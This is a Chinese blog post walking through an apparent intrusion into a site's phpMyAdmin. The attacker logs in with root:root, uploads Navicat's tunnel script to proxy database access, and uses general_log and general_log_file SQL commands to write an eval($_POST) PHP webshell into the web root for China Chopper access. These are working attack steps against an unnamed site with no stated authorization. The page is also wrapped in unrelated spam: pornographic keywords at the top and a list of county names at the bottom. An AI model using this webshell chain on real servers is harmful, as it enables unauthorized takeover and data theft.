久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

Phpmyadmin滲透測試的示例

135次閱讀
沒有評論

共計(jì) 942 個字符,預(yù)計(jì)需要花費(fèi) 3 分鐘才能閱讀完成。

自動寫代碼機(jī)器人,免費(fèi)開通

這篇文章給大家分享的是有關(guān) Phpmyadmin 滲透測試的示例的內(nèi)容。丸趣 TV 小編覺得挺實(shí)用的,因此分享給大家做個參考,一起跟隨丸趣 TV 小編過來看看吧。

首先通過目錄掃描對某站進(jìn)行掃描,發(fā)現(xiàn)存在 phpmyadmin,嘗試弱口令 root:root 很幸運(yùn)進(jìn)去了

Phpmyadmin 滲透測試的示例

嘗試使用 Navicate 進(jìn)行數(shù)據(jù)庫連接返回禁止遠(yuǎn)程連接數(shù)據(jù)庫:

Phpmyadmin 滲透測試的示例

但是遠(yuǎn)程命令執(zhí)行發(fā)現(xiàn)本地 3306 端口時開放的,于是嘗試通過代理進(jìn)行連接:

Phpmyadmin 滲透測試的示例

Navicat 安裝目錄下上傳 ntunnel_mysql.php 文件(數(shù)據(jù)庫的代理腳本)到目標(biāo)服務(wù)器任意 web 站點(diǎn)目錄(后面 getshell 后上傳的)

Phpmyadmin 滲透測試的示例

上傳到 D:/phpStudy/WWW 目錄進(jìn)行訪問 http://XXX/ntunnel_mysql.php 測試成功

Phpmyadmin 滲透測試的示例

進(jìn)行測試連接:

(此時, 在本地打開 Navicat 配置 http 連接, 這里的通道地址就寫你上面訪問的那個 url, 說白點(diǎn)兒就是個代理端, 勾上使用 base64 編碼, 防止 waf 從中作祟, 然后主機(jī)名寫 localhost, 賬號密碼寫 lnmp01 本地?cái)?shù)據(jù)庫用戶的賬號即可, 因?yàn)橐B接 lnmp01 本地的 mysql)

Phpmyadmin 滲透測試的示例

Phpmyadmin Get Shell:

利用日志文件

mysql 5.0 版本以上會創(chuàng)建日志文件,修改日志的全局變量,也可以 getshell。但是也要對生成的日志有可讀可寫的權(quán)限。

set global general_log =  ON  # 當(dāng)開啟 general 時,所執(zhí)行的 sql 語句都會出現(xiàn)在 WIN-30DFNC8L78A.log 文件那么,如果修改 general_log_file 的值,那么所執(zhí)行的 sql 語句就會對應(yīng)生成進(jìn)而 getshell
SET global general_log_file= D:/phpStudy/WWW/test1234.php  # 對應(yīng)就會生成 test1234.php 文件
select  ?php eval($_POST[2019]);?  # 將一句話木馬寫入 test1234.php 文件 

Phpmyadmin 滲透測試的示例

菜刀連接:

Phpmyadmin 滲透測試的示例

感謝各位的閱讀!關(guān)于“Phpmyadmin 滲透測試的示例”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向 AI 問一下細(xì)節(jié)

正文完
 
丸趣
版權(quán)聲明:本站原創(chuàng)文章,由 丸趣 2023-12-04發(fā)表,共計(jì)942字。
轉(zhuǎn)載說明:除特殊說明外本站除技術(shù)相關(guān)以外文章皆由網(wǎng)絡(luò)搜集發(fā)布,轉(zhuǎn)載請注明出處。
評論(沒有評論)
主站蜘蛛池模板: 松滋市| 朝阳市| 东乡县| 衢州市| 八宿县| 疏附县| 鹿泉市| 略阳县| 宜昌市| 乌鲁木齐县| 平原县| 东乡| 绵阳市| 珲春市| 米脂县| 乌兰浩特市| 乌苏市| 东宁县| 临沂市| 巫山县| 巴楚县| 湟源县| 隆化县| 葫芦岛市| 潮州市| 东方市| 安乡县| 灌阳县| 汉源县| 邛崃市| 武宁县| 通化市| 铜川市| 花莲县| 镇巴县| 新巴尔虎右旗| 闽侯县| 碌曲县| 东乡县| 奉节县| 鄂尔多斯市|